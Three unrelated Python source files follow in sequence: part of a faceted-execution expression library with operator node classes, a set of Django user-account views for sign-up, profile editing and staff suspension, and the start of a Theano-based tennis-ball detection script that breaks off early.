      return JeevesLib.jif(self.cond,
        lambda : self.thn.__len__(),
        lambda : self.els.__len__())
    else:
      raise TypeError("cannot take len of non-object; type %s" % self.type.__name__)
  def __getstate__(self):
    return "<%s:%s?%s>" % \
      (self.cond.__getstate__(), self.thn.__getstate__(),
        self.els.__getstate__())
class Constant(FExpr):
  """Leaf AST node wrapping a concrete (non-faceted) Python value."""
  def __init__(self, v):
    # TODO
    #assert not isinstance(v, FExpr)
    self.v = v
    self.type = type(v)
  def eval(self, env):
    return self.v
  def vars(self):
    return set()
  def z3Node(self):
    # Plain Python values are handed to z3 as-is.
    return self.v
  def getChildren(self):
    return []
  def remapLabels(self, policy, writer):
    return self
  def partialEval(self, env={}, unassignedOkay=False):
    return self
  def prettyPrint(self, indent=""):
    return indent + "const:" + repr(self.v)
  def __call__(self, *args, **kw):
    return self.v(*args, **kw)
  def __getstate__(self):
    # Bug fix: the original used '+' which left the %s placeholder
    # unformatted ("(Const:%s)<repr>"); interpolate with % as the sibling
    # classes do.
    return "(Const:%s)" % repr(self.v)
'''
Binary expressions.
'''
class BinaryExpr(FExpr):
  """Base class for two-operand AST nodes.

  Concrete subclasses supply class attributes `opr` (the plain-value
  operator used by partialEval) and `ret_type` (the node's result type).
  """
  def __init__(self, left, right):
    self.left = left
    self.right = right
    # ret_type is defined on each concrete subclass.
    self.type = self.ret_type
  def vars(self):
    return self.left.vars().union(self.right.vars())
  def getChildren(self):
    return [self.left, self.right]
  def partialEval(self, env={}, unassignedOkay=False):
    left = self.left.partialEval(env, unassignedOkay)
    right = self.right.partialEval(env, unassignedOkay)
    # facetJoin (defined elsewhere) pushes opr through any facets in the
    # partially-evaluated operands.
    return facetJoin(left, right, self.opr)
class UnaryExpr(FExpr):
  """Base class for one-operand AST nodes; subclasses supply opr/ret_type."""
  def __init__(self, sub):
    self.sub = sub
    self.type = self.ret_type
  def vars(self):
    return self.sub.vars()
  def getChildren(self):
    return [self.sub]
  def partialEval(self, env={}, unassignedOkay=False):
    sub = self.sub.partialEval(env, unassignedOkay)
    # facetApply (defined elsewhere) maps opr over any facets in sub.
    return facetApply(sub, self.opr)
'''
Operators.
'''
class Add(BinaryExpr):
  """Faceted integer addition."""
  opr = staticmethod(operator.add)
  ret_type = int
  def eval(self, env):
    return self.left.eval(env) + self.right.eval(env)
  def z3Node(self):
    return self.left.z3Node() + self.right.z3Node()
  def remapLabels(self, policy, writer):
    return Add(
      self.left.remapLabels(policy, writer)
      , self.right.remapLabels(policy, writer))
class Sub(BinaryExpr):
  """Faceted integer subtraction."""
  opr = staticmethod(operator.sub)
  ret_type = int
  def eval(self, env):
    return self.left.eval(env) - self.right.eval(env)
  def z3Node(self):
    return self.left.z3Node() - self.right.z3Node()
  def remapLabels(self, policy, writer):
    return Sub(
      self.left.remapLabels(policy, writer)
      , self.right.remapLabels(policy, writer))
class Mult(BinaryExpr):
  """Faceted integer multiplication."""
  opr = staticmethod(operator.mul)
  ret_type = int
  def eval(self, env):
    return self.left.eval(env) * self.right.eval(env)
  def z3Node(self):
    return self.left.z3Node() * self.right.z3Node()
  def remapLabels(self, policy, writer):
    return Mult(
      self.left.remapLabels(policy, writer)
      , self.right.remapLabels(policy, writer))
class Div(BinaryExpr):
  """Faceted division; no z3 translation.

  NOTE: operator.div exists only in Python 2 (this module already relies on
  py2 features such as dict.iteritems).
  """
  opr = staticmethod(operator.div)
  ret_type = int
  def eval(self, env):
    return self.left.eval(env) / self.right.eval(env)
  def z3Node(self):
    return NotImplemented
  def remapLabels(self, policy, writer):
    return Div(
      self.left.remapLabels(policy, writer)
      , self.right.remapLabels(policy, writer))
class Mod(BinaryExpr):
  """Faceted modulo; no z3 translation."""
  opr = staticmethod(operator.mod)
  ret_type = int
  def eval(self, env):
    return self.left.eval(env) % self.right.eval(env)
  def z3Node(self):
    return NotImplemented
  def remapLabels(self, policy, writer):
    return Mod(
      self.left.remapLabels(policy, writer)
      , self.right.remapLabels(policy, writer))
# Not sure if bitwise operations are supported by Z3?
class BitAnd(BinaryExpr):
  """Faceted bitwise AND; no z3 translation."""
  opr = staticmethod(operator.and_)
  ret_type = int
  def eval(self, env):
    return self.left.eval(env) & self.right.eval(env)
  def z3Node(self):
    return NotImplemented
  def remapLabels(self, policy, writer):
    return BitAnd(
      self.left.remapLabels(policy, writer)
      , self.right.remapLabels(policy, writer))
class BitOr(BinaryExpr):
  """Faceted bitwise OR; no z3 translation."""
  opr = staticmethod(operator.or_)
  ret_type = int
  def eval(self, env):
    return self.left.eval(env) | self.right.eval(env)
  def z3Node(self):
    return NotImplemented
  def remapLabels(self, policy, writer):
    return BitOr(
      self.left.remapLabels(policy, writer)
      , self.right.remapLabels(policy, writer))
class LShift(BinaryExpr):
  """Faceted left shift; no z3 translation.

  Fix: opr was operator.ilshift (the in-place <<= operator); the
  non-mutating operator.lshift matches eval()'s use of <<. The results are
  identical for int operands, but lshift is the correct pairing.
  """
  opr = staticmethod(operator.lshift)
  ret_type = int
  def eval(self, env):
    return self.left.eval(env) << self.right.eval(env)
  def z3Node(self):
    return NotImplemented
  def remapLabels(self, policy, writer):
    return LShift(
      self.left.remapLabels(policy, writer)
      , self.right.remapLabels(policy, writer))
class RShift(BinaryExpr):
  """Faceted right shift; no z3 translation.

  Fix: opr was operator.irshift (the in-place >>= operator); the
  non-mutating operator.rshift matches eval()'s use of >>.
  """
  opr = staticmethod(operator.rshift)
  ret_type = int
  def eval(self, env):
    return self.left.eval(env) >> self.right.eval(env)
  def z3Node(self):
    return NotImplemented
  def remapLabels(self, policy, writer):
    return RShift(
      self.left.remapLabels(policy, writer)
      , self.right.remapLabels(policy, writer))
# Boolean operations
class And(BinaryExpr):
  """Faceted logical conjunction.

  eval() uses short-circuiting `and`; opr is operator.and_ (bitwise), which
  agrees with logical AND when the operand values are bools.
  """
  opr = staticmethod(operator.and_)
  ret_type = bool
  def eval(self, env):
    return self.left.eval(env) and self.right.eval(env)
  def z3Node(self):
    return z3.And(self.left.z3Node(), self.right.z3Node())
  def remapLabels(self, policy, writer):
    return And(
      self.left.remapLabels(policy, writer)
      , self.right.remapLabels(policy, writer))
class Or(BinaryExpr):
  """Faceted logical disjunction.

  eval() uses short-circuiting `or`; opr is operator.or_ (bitwise), which
  agrees with logical OR when the operand values are bools.
  """
  opr = staticmethod(operator.or_)
  ret_type = bool
  def eval(self, env):
    return self.left.eval(env) or self.right.eval(env)
  def z3Node(self):
    return z3.Or(self.left.z3Node(), self.right.z3Node())
  def remapLabels(self, policy, writer):
    return Or(
      self.left.remapLabels(policy, writer)
      , self.right.remapLabels(policy, writer))
class Not(UnaryExpr):
  """Faceted logical negation."""
  opr = staticmethod(operator.not_)
  ret_type = bool
  def eval(self, env):
    return not self.sub.eval(env)
  def z3Node(self):
    return z3.Not(self.sub.z3Node())
  def remapLabels(self, policy, writer):
    return Not(self.sub.remapLabels(policy, writer))
  def __getstate__(self):
    return "(Not(%s))" % self.sub.__getstate__()
# Doesn't correspond to a Python operator but is useful
class Implies(BinaryExpr):
  """Faceted logical implication: (not left) or right."""
  opr = staticmethod(lambda x, y : (not x) or y)
  ret_type = bool
  def eval(self, env):
    return (not self.left.eval(env)) or self.right.eval(env)
  def z3Node(self):
    return z3.Implies(self.left.z3Node(), self.right.z3Node())
  def remapLabels(self, policy, writer):
    return Implies(
      self.left.remapLabels(policy, writer)
      , self.right.remapLabels(policy, writer))
# Comparison operations
class Eq(BinaryExpr):
  """Faceted equality comparison."""
  opr = staticmethod(operator.eq)
  ret_type = bool
  def eval(self, env):
    return self.left.eval(env) == self.right.eval(env)
  def z3Node(self):
    return self.left.z3Node() == self.right.z3Node()
  def remapLabels(self, policy, writer):
    return Eq(
      self.left.remapLabels(policy, writer)
      , self.right.remapLabels(policy, writer))
  def __getstate__(self):
    return "(Eq(%s)(%s))" % \
      (self.left.__getstate__(), self.right.__getstate__())
class Lt(BinaryExpr):
  """Faceted strict less-than comparison."""
  opr = staticmethod(operator.lt)
  ret_type = bool
  def eval(self, env):
    return self.left.eval(env) < self.right.eval(env)
  def z3Node(self):
    return self.left.z3Node() < self.right.z3Node()
  def remapLabels(self, policy, writer):
    return Lt(
      self.left.remapLabels(policy, writer)
      , self.right.remapLabels(policy, writer))
  def __getstate__(self):
    return "(Lt(%s)(%s))" % \
      (self.left.__getstate__(), self.right.__getstate__())
class LtE(BinaryExpr):
  """Faceted less-than-or-equal comparison."""
  opr = staticmethod(operator.le)
  ret_type = bool
  def eval(self, env):
    return self.left.eval(env) <= self.right.eval(env)
  def z3Node(self):
    return self.left.z3Node() <= self.right.z3Node()
  def remapLabels(self, policy, writer):
    return LtE(
      self.left.remapLabels(policy, writer)
      , self.right.remapLabels(policy, writer))
  def __getstate__(self):
    return "(LtE(%s)(%s))" % \
      (self.left.__getstate__(), self.right.__getstate__())
class Gt(BinaryExpr):
  """Faceted strict greater-than comparison."""
  opr = staticmethod(operator.gt)
  ret_type = bool
  def eval(self, env):
    return self.left.eval(env) > self.right.eval(env)
  def z3Node(self):
    return self.left.z3Node() > self.right.z3Node()
  def remapLabels(self, policy, writer):
    return Gt(
      self.left.remapLabels(policy, writer)
      , self.right.remapLabels(policy, writer))
  def __getstate__(self):
    return "(Gt(%s)(%s))" % \
      (self.left.__getstate__(), self.right.__getstate__())
class GtE(BinaryExpr):
  """Faceted greater-than-or-equal comparison."""
  opr = staticmethod(operator.ge)
  ret_type = bool
  def eval(self, env):
    return self.left.eval(env) >= self.right.eval(env)
  def z3Node(self):
    return self.left.z3Node() >= self.right.z3Node()
  def remapLabels(self, policy, writer):
    return GtE(
      self.left.remapLabels(policy, writer)
      , self.right.remapLabels(policy, writer))
  def __getstate__(self):
    return "(GtE(%s)(%s))" % \
      (self.left.__getstate__(), self.right.__getstate__())
class Unassigned(FExpr):
  """Placeholder for a missing attribute/item; evaluating or calling it
  raises, and attribute access propagates the placeholder.

  Fix: the class previously defined remapLabels twice -- the first with a
  (self, policy) signature that would have raised TypeError had it not been
  silently overridden by the later definition. Only the (policy, writer)
  overload is kept.
  """
  def __init__(self, thing_not_found):
    self.type = None
    self.thing_not_found = thing_not_found
  def eval(self, env):
    raise self.getException()
  def z3Node(self):
    pass #TODO ?? what goes here
  def getChildren(self):
    return []
  def vars(self):
    return set()
  def remapLabels(self, policy, writer):
    return self
  def partialEval(self, env={}, unassignedOkay=False):
    if unassignedOkay:
      return self
    else:
      raise self.getException()
  def getException(self):
    return Exception("wow such error: %s does not exist." % (self.thing_not_found,))
  def __call__(self, *args, **kwargs):
    raise self.getException()
  def __getattr__(self, attr):
    #raise self.getException()
    # Missing attributes stay "unassigned" rather than raising eagerly.
    return Unassigned(self.thing_not_found)
  def __getstate__(self):
    return "(Unassigned:%s)" % repr(self)
# TODO(TJH): figure out the correct implementation of this
def is_obj(o):
  """Return True when o should be wrapped as an FObject: lists, tuples,
  anything carrying a __dict__, or None."""
  if o is None:
    return True
  if isinstance(o, (list, tuple)):
    return True
  return hasattr(o, '__dict__')
# helper method
def fexpr_cast(a):
  # Lift an arbitrary Python value into the FExpr hierarchy: FExprs pass
  # through, lists become faceted JLists, other "object-like" values are
  # wrapped in FObject, and remaining primitives become Constants.
  if isinstance(a, FExpr):
    return a
  elif isinstance(a, list):
    return FObject(JeevesLib.JList(a))
  elif is_obj(a):
    return FObject(a)
  else:
    return Constant(a)
class FObject(FExpr):
  """Wraps a concrete Python object (or Jeeves list) so it can participate
  in the FExpr protocol; most operations delegate to the wrapped value v."""
  def __init__(self, v):
    assert not isinstance(v, JeevesLib.Namespace)
    assert not isinstance(v, FObject)
    # Assigned through __dict__ because __setattr__ below is overloaded.
    self.__dict__['v'] = v
    self.__dict__['type'] = object
  def eval(self, env):
    # Jeeves list wrappers carry faceted contents that must be evaluated.
    if isinstance(self.v, JeevesLib.JList):
      return self.v.l.eval(env)
    elif isinstance(self.v, JeevesLib.JList2):
      return self.v.eval(env)
    else:
      return self.v
  def vars(self):
    if isinstance(self.v, JeevesLib.JList):
      return self.v.l.vars()
    elif isinstance(self.v, JeevesLib.JList2):
      return self.v.vars()
    else:
      return set()
  def z3Node(self):
    # The wrapper's identity stands in for the object in z3 terms.
    return id(self)
  def getChildren(self):
    return []
  # TODO: Make sure this is right...
  def remapLabels(self, policy, writer):
    if isinstance(self.v, FExpr):
      return FObject(self.v.remapLabels(policy, writer))
    else:
      return self
  def partialEval(self, env={}, unassignedOkay=False):
    return self
  def __call__(self, *args, **kw):
    return self.v.__call__(*args, **kw)
  # called whenever an attribute that does not exist is accessed
  def __getattr__(self, attribute):
    # Missing attributes become Unassigned placeholders instead of raising.
    if hasattr(self.v, attribute):
      return getattr(self.v, attribute)
    else:
      return Unassigned("attribute '%s'" % attribute)
  def __setattr__(self, attribute, val):
    if attribute in self.__dict__:
      self.__dict__[attribute] = val
    else:
      setattr(self.v, attribute, val)
  def __getitem__(self, item):
    try:
      return self.v[item]
    except (KeyError, IndexError, TypeError):
      return Unassigned("item '%s'" % item)
  def __setitem__(self, item, val):
    self.v[item] = val
  def __len__(self):
    return self.v.__len__()
  def __eq__(self, other):
    # Prefer the wrapped object's own comparison; fall back to a symbolic
    # comparison node when it has none.
    try:
      f = getattr(self.v, '__eq__')
    except AttributeError:
      return Eq(self, fexpr_cast(other))
    return f(other)
  def __ne__(self, other):
    try:
      f = getattr(self.v, '__ne__')
    except AttributeError:
      return Not(Eq(self, fexpr_cast(other)))
    return f(other)
  def __lt__(self, other):
    try:
      f = getattr(self.v, '__lt__')
    except AttributeError:
      return Lt(self, fexpr_cast(other))
    return f(other)
  def __gt__(self, other):
    try:
      f = getattr(self.v, '__gt__')
    except AttributeError:
      return Gt(self, fexpr_cast(other))
    return f(other)
  def __le__(self, other):
    try:
      f = getattr(self.v, '__le__')
    except AttributeError:
      return LtE(self, fexpr_cast(other))
    return f(other)
  def __ge__(self, other):
    try:
      f = getattr(self.v, '__ge__')
    except AttributeError:
      return GtE(self, fexpr_cast(other))
    return f(other)
  def prettyPrint(self, indent=""):
    return 'FObject:%s' % str(self.v)
  def __getstate__(self):
    return "(FObject(%s):%s)" % (id(self.v), self.v.__getstate__())
  def __html__(self):
    # Template-engine hook; delegates to the wrapped object's markup.
    return self.v.__html__()
class FNull(FExpr):
  """Stub for a faceted null value; operator overloads are not implemented."""
  def __init__(self):
    pass
  # NOTE(review): the string below appears to be a scratch list of operator
  # overloads that were planned but never implemented; it is a no-op
  # expression at class level.
  """
  def __and__(l, r):
  def __rand__(r, l):
  def __or__(l, r):
  def __ror__(r, l):
  def __add__(l, r):
  def __radd__(r, l):
  def __sub__(l, r):
  def __rsub__(r, l):
  def __mul__(l, r):
  def __rmul__(r, l):
  def __div__(l, r):
  def __rdiv__(r, l):
  def __mod__(l, r):
  def __rmod__(r, l):
  """
| |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from math import ceil
import re
from smtplib import SMTPException
from boards.models import Board, Reply
from boards.table import BoardTable
from core.utils import error_page
from django.conf import settings
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib.auth.decorators import login_required, user_passes_test
from django.contrib.auth.models import User
from django.core.mail import send_mail
from django.core.signing import TimestampSigner
from django.db.models import Q
from django.shortcuts import get_object_or_404, redirect, render
from django.urls import reverse_lazy
from django.utils import timezone
from django.utils.translation import ugettext as _
from teams.table import TeamTable
from .forms import RegistrationForm, SettingForm, UserInfoForm
from .models import Profile, UserSession
@login_required
def setting(request):
    """Display and save the current user's alarm/UI settings.

    POST: validate SettingForm and copy its fields onto request.user.profile,
    clamping alarm_interval to [MIN_ALARM_INTERVAL, MAX_ALARM_INTERVAL].
    GET: render the form pre-filled from the profile.
    """
    if request.method == "POST":
        settingform = SettingForm(request.POST)
        if settingform.is_valid():
            # Unsaved model instance used only as a carrier for cleaned fields.
            setting = settingform.save(commit=False)
            request.user.profile.sense_client = setting.sense_client
            request.user.profile.sense_slot = setting.sense_slot
            request.user.profile.alarm_board = setting.alarm_board
            # alarm_reply and alarm_full are forced on regardless of the form
            # input -- presumably intentional; TODO confirm.
            request.user.profile.alarm_reply = True
            request.user.profile.alarm_paper = setting.alarm_paper
            request.user.profile.alarm_team = setting.alarm_team
            request.user.profile.alarm_full = True
            # Clamp the alarm polling interval into the configured bounds.
            if setting.alarm_interval < settings.MIN_ALARM_INTERVAL:
                request.user.profile.alarm_interval \
                    = settings.MIN_ALARM_INTERVAL
            elif setting.alarm_interval > settings.MAX_ALARM_INTERVAL:
                request.user.profile.alarm_interval \
                    = settings.MAX_ALARM_INTERVAL
            else:
                request.user.profile.alarm_interval = setting.alarm_interval
            request.user.profile.save()
            msg = _('Saved successfully.')
        else:
            msg = _('Form validation Failure')
    elif request.method == "GET":
        if request.user.is_authenticated:
            msg = ""
            settingform = SettingForm(instance=request.user.profile)
        else:
            return redirect('/')
    # NOTE(review): a request method other than GET/POST would leave msg and
    # settingform unbound here -- verify only GET/POST are routed to this view.
    return render(
        request,
        "accounts/setting.html",
        {
            'settingform': settingform,
            'msg': msg,
        }
    )
@login_required
def edit_user_info(request):
    """Edit the current user's profile (nickname, email, portrait, ...).

    A nickname change is validated for uniqueness and length; an email
    change must be confirmed with a signed verification code. Fix: the bare
    ``except:`` around signature verification (which also swallowed
    SystemExit/KeyboardInterrupt) is narrowed to ``except Exception:``.
    """
    profile = get_object_or_404(Profile, pk=request.user.profile.id)
    if request.method == "POST":
        infoform = UserInfoForm(request.POST, request.FILES, instance=profile)
        if infoform.is_valid():
            error = False
            if settings.ENABLE_NICKNAME:
                nick = infoform.cleaned_data['first_name']
                if nick != request.user.first_name:
                    if nick == '':
                        request.user.first_name = ''
                    else:
                        # Nickname must not collide with any existing
                        # username or nickname and must satisfy length limits.
                        q = Q(username__iexact=nick) \
                            | Q(first_name__iexact=nick)
                        if User.objects.filter(q).exists() or \
                                len(nick) < settings.NICKNAME_MIN_LENGTH or \
                                len(nick) > settings.NICKNAME_MAX_LENGTH:
                            msg = _('Please check nickname.')
                            error = True
                        else:
                            request.user.first_name = nick
            email = infoform.cleaned_data['email']
            if not error and email != request.user.email:
                code = infoform.cleaned_data['code']
                signer = TimestampSigner()
                try:
                    value = signer.unsign(
                        code, max_age=settings.VERIFICATION_CODE_VALID)
                    code_check = value == email
                    if code_check:
                        request.user.email = email
                    else:
                        msg = _('Verification failure. Please check verification code again.')
                        error = True
                except Exception:
                    # Expired, forged or malformed code
                    # (SignatureExpired / BadSignature).
                    msg = _('Verification failure. Please check verification code again.')
                    error = True
            if not error:
                msg = _('Saved successfully.')
                request.user.save()
                infoform.save()
        else:
            msg = _('Form validation Failure')
    elif request.method == "GET":
        if request.user.is_authenticated:
            msg = ""
            infoform = UserInfoForm(instance=profile)
        else:
            return redirect('/')
    return render(
        request,
        "accounts/edit_user_info.html",
        {
            'infoform': infoform,
            'username': request.user.username,
            'date_joined': request.user.date_joined,
            'point': profile.point,
            'portrait': profile.portrait,
            'msg': msg,
        }
    )
@login_required
def user_info(request, user):
    """Render a user's public info page with article and reply counts."""
    target = User.objects.get(username__iexact=user)
    article_no = Board.objects.filter(user__username__iexact=user).count()
    reply_no = Reply.objects.filter(user__username__iexact=user).count()
    context = {
        'userinfo': target,
        'article_no': article_no,
        'reply_no': reply_no,
    }
    return render(request, "accounts/user_info.html", context)
@login_required
def scrap_list(request, page=0):
    """Show the user's scrapped articles, paginated.

    Fix: an empty profile.scrap previously produced [''] via split(','), so
    users with no scraps were reported as having a total of 1.
    """
    if int(page) < 1:
        return redirect('accounts:scrap_list', page=1)
    board_table = BoardTable()
    my_scrap = []
    name_list = board_table.get_table_list()
    list_count = board_table.get_list_count()
    current_page = int(page) - 1
    start_at = current_page * list_count
    end_at = start_at + list_count
    # Only articles in a visible state are listed.
    q = Q(status__iexact='1normal') | Q(status__iexact='4warning') \
        | Q(status__iexact='3notice')
    raw_scrap = request.user.profile.scrap
    scrap = raw_scrap.split(',') if raw_scrap else []
    total = len(scrap)
    for s in scrap[start_at:end_at]:
        # Entries are "<app>:<id>" pairs; only board scraps are supported.
        app, item_id = s.split(':')
        if app == 'boards':
            item = Board.objects.filter(id__iexact=item_id).filter(q)
            if item.count():
                my_scrap.append([item[0]])
        else:
            continue
    # Pagination window: 10 pages wide on desktop, 5 on mobile.
    index_total = int(ceil(float(total) / list_count))
    index_begin = int(current_page / 10) * 10 + 1
    index_end = mindex_end = index_total
    if index_end - index_begin >= 10:
        index_end = index_begin + 9
    mindex_begin = int(current_page / 5) * 5 + 1
    if mindex_end - mindex_begin >= 5:
        mindex_end = mindex_begin + 4
    return render(
        request,
        "accounts/scrap.html",
        {
            'my_scrap': my_scrap,
            'total': total,
            'page': current_page + 1,
            'index_begin': index_begin,
            'index_end': index_end + 1,
            'mindex_begin': mindex_begin,
            'mindex_end': mindex_end + 1,
            'index_total': index_total,
            'name_list': name_list,
        }
    )
@login_required
def delete_scrap(request, id):
    """Remove one board scrap ("boards:<id>") from the user's scrap CSV list."""
    # NOTE: `id` shadows the builtin but is kept for URLconf compatibility.
    profile = request.user.profile
    app_id = 'boards:' + id
    # Match the entry plus a following comma if present; \b keeps e.g.
    # "boards:5" from matching a prefix of "boards:55".
    regstr = re.escape(app_id) + r"\b(,|)"
    profile.scrap = re.sub(regstr, '', profile.scrap)
    # Drop the dangling trailing comma left when the removed entry was last.
    if profile.scrap and profile.scrap[-1] == ',':
        profile.scrap = profile.scrap[:-1]
    request.user.profile.save()
    return redirect('accounts:scrap_list_0')
@login_required
def edit_bookmarks(request):
    """Render the bookmark-editing page with the user's saved board/team names."""
    my_bookmark = []
    raw = request.user.profile.bookmarks
    if raw:
        for bm in raw.split(','):
            # Entries are "<app>-<table_id>" pairs.
            app, table_id = bm.split('-')
            if app == 'boards':
                table = BoardTable()
            elif app == 'teams':
                table = TeamTable()
            else:
                continue
            my_bookmark.append([bm, table.get_table_name(table_id)])
    return render(
        request,
        "accounts/edit_bookmarks.html",
        {
            'my_bookmark': my_bookmark,
        }
    )
def sign_up(request):
    """Register a new account.

    Validates username/nickname uniqueness and length, then requires a
    timestamp-signed email verification code before saving. Fix: the bare
    ``except:`` (which also swallowed SystemExit/KeyboardInterrupt) is
    narrowed to ``except Exception:``.
    """
    if request.method == "POST":
        userform = RegistrationForm(request.POST)
        if userform.is_valid():
            userform.save(commit=False)
            username = userform.cleaned_data['username']
            # Username must not collide with any username/nickname.
            q = Q(username__iexact=username) | Q(first_name__iexact=username)
            if User.objects.filter(q).exists() or \
                    len(username) < settings.ID_MIN_LENGTH or \
                    len(username) > settings.ID_MAX_LENGTH:
                errormsg = _('Please check username.')
                return error_page(request, errormsg)
            if settings.ENABLE_NICKNAME:
                nick = userform.cleaned_data['first_name']
                if nick:
                    q = Q(username__iexact=nick) | Q(first_name__iexact=nick)
                    if User.objects.filter(q).exists() or \
                            len(nick) < settings.NICKNAME_MIN_LENGTH or \
                            len(nick) > settings.NICKNAME_MAX_LENGTH:
                        errormsg = _('Please check nickname.')
                        return error_page(request, errormsg)
            code = userform.cleaned_data['code']
            email = userform.cleaned_data['email']
            signer = TimestampSigner()
            try:
                value = signer.unsign(
                    code, max_age=settings.VERIFICATION_CODE_VALID)
                code_check = value == email
                if code_check:
                    userform.save()
                    return render(
                        request,
                        "accounts/join.html",
                    )
                else:
                    errormsg = _('Verification failure. Please check verification code again.')
            except Exception:
                # Expired, forged or malformed verification code.
                errormsg = _('Verification failure. Please check verification code again.')
        else:
            errormsg = _('Sorry. Please try again later.')
        return error_page(request, errormsg)
    elif request.method == "GET":
        userform = RegistrationForm()
    return render(
        request,
        "accounts/signup.html",
        {
            'userform': userform,
        }
    )
@login_required
def show_deactivate_account(request):
    """Render the confirmation page for deactivating the account."""
    return render(request, "accounts/deactivate_account.html")
@login_required
def deactivate_account(request):
    """Mark the current user inactive (dropping any staff flag) and log out."""
    user = request.user
    if user.is_authenticated:
        user.is_active = False
        if user.is_staff:
            user.is_staff = False
        user.save()
    return redirect(reverse_lazy('accounts:logout'))
@user_passes_test(lambda u: u.is_superuser)
def send_email(request):
    """Send a signed test email to the requesting superuser's own address."""
    id_email = request.user.email
    # The signed address doubles as a sample verification keyCode.
    signer = TimestampSigner()
    value = signer.sign(id_email)
    subject = u'Test email.'
    body = u'keyCode: %s' % value
    try:
        send_mail(subject, body, settings.EMAIL_HOST_USER, [id_email], fail_silently=False)
        # error_page is reused as a generic message page; 201 marks success.
        return error_page(request, "Email sent", status=201)
    except SMTPException:
        return error_page(request, "Error!")
@staff_member_required
def dashboard_user(request, search_word='', condition='recent', page=1):
    """Staff dashboard: list users matching search_word, sorted by condition.

    condition is one of 'recent', 'point', 'login', 'suspension' or
    'default'; anything else returns the generic error page.
    """
    list_count = settings.DASHBOARD_LIST_COUNT
    if int(page) < 1:
        return redirect('accounts:dashboard_user', condition, 1)
    if condition == 'recent':
        order = '-id'
    elif condition == 'point':
        order = '-profile__point'
    elif condition == 'login':
        order = '-last_login'
    elif condition == 'suspension':
        order = '-profile__suspension_till'
    elif condition != 'default':
        return error_page(request)
    # 'default' falls through without setting order; it uses the fixed
    # ordering in the branch below.
    current_page = int(page) - 1
    start_at = current_page * list_count
    end_at = start_at + list_count
    if search_word == '':
        q = Q()
    else:
        # Match username, nickname, email, or any recorded IP address.
        q = (Q(username__icontains=search_word) | Q(first_name__icontains=search_word)) | Q(email__icontains=search_word) | Q(profile__ip_list__icontains=search_word)
    total = User.objects.filter(q).count()
    if condition == 'default':
        users = User.objects.filter(q).order_by(
            '-is_superuser', '-is_staff', '-is_active', 'username')[
            start_at:end_at]
    elif condition == 'suspension':
        # Only currently-suspended (inactive) accounts.
        users = User.objects.filter(q).filter(is_active=False).order_by(
            order)[start_at:end_at]
    else:
        users = User.objects.filter(q).order_by(order)[start_at:end_at]
    # Pagination window: 10 pages wide on desktop, 5 on mobile.
    index_total = int(ceil(float(total) / list_count))
    index_begin = int(current_page / 10) * 10 + 1
    index_end = mindex_end = index_total
    if index_end - index_begin >= 10:
        index_end = index_begin + 9
    mindex_begin = int(current_page / 5) * 5 + 1
    if mindex_end - mindex_begin >= 5:
        mindex_end = mindex_begin + 4
    return render(
        request,
        "accounts/dashboard_user.html",
        {
            'users': users,
            'total': total,
            'page': current_page + 1,
            'index_begin': index_begin,
            'index_end': index_end + 1,
            'mindex_begin': mindex_begin,
            'mindex_end': mindex_end + 1,
            'index_total': index_total,
            'search_word': search_word,
            'condition': condition,
        }
    )
@staff_member_required
def suspension(request, user, days):
    """Suspend a user's account for `days` days, or lift it when days == 0.

    Fix: suspension_till lives on the related Profile model, but only
    userinfo.save() was called -- Django does not cascade saves to related
    objects, so the profile change was silently dropped. The profile is now
    saved explicitly in both branches.
    """
    sus_days = int(days)
    userinfo = User.objects.filter(username__iexact=user).get()
    if sus_days == 0 and not userinfo.is_active:
        # Lift the suspension: reset the timestamp and reactivate.
        userinfo.profile.suspension_till = timezone.now()
        userinfo.is_active = True
        userinfo.profile.save()
        userinfo.save()
    elif sus_days > 0:
        sus_until = timezone.now() + timezone.timedelta(days=sus_days)
        userinfo.profile.suspension_till = sus_until
        userinfo.is_active = False
        userinfo.profile.save()
        userinfo.save()
        # Kick the suspended user out of any live sessions immediately.
        sessions = UserSession.objects.filter(user=userinfo)
        for session in sessions:
            session.session.delete()
    return redirect('accounts:user_info', user)
| |
#!/usr/bin/env python
'''
Copyright 2017 Nick Curtis
Redistribution and use in source and binary forms, with or without modification, are
permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of
conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of
conditions and the following disclaimer in the documentation and/or other materials
provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
#########################################################################################
#File name: ReadImage.py
#Authors: Nick
'''
Uses a convolutional neural network to detect tennis balls
'''
'''
How do you call this node?
rosrun <vision_neural_net> <ReadImage.py> <parameters>
'''
#Topics this node is subscribed to: camera feed
#Topics this node publishes to
#Services this node uses
#Other dependencies?
#########################################################################################
import cv2
import sys
import argparse
import time
import glob
import numpy as np
import theano
import theano.tensor as T
import lasagne
#CONSTANTS (organize these as necessary)
#names for constants should be in ALL CAPS
#########################################################################################
#Setup
#every node should have one
def Setup(args):
  """One-time initialization: open the video source chosen by args.vid,
  build the classifier, sanity-check it on a reference tennis-ball image,
  then hand control to Loop()."""
  #Set up camera feed
  if args.vid == 'cam':
    print 'Setting up camera feed...',
    cap = cv2.VideoCapture(0)
    print 'done'
  elif args.vid == 'image':
    # Sentinel value: Loop() treats -1 as "no live capture".
    cap = -1
  elif args.vid == 'ros':
    print 'ROS is not currently supported'
    return
  else:
    print 'Argument not supported'
    return
  print 'Building the neural network...',
  predict_fn = prepare_network()
  print 'done.'
  #Create and show this image for testing (I'm pointing the
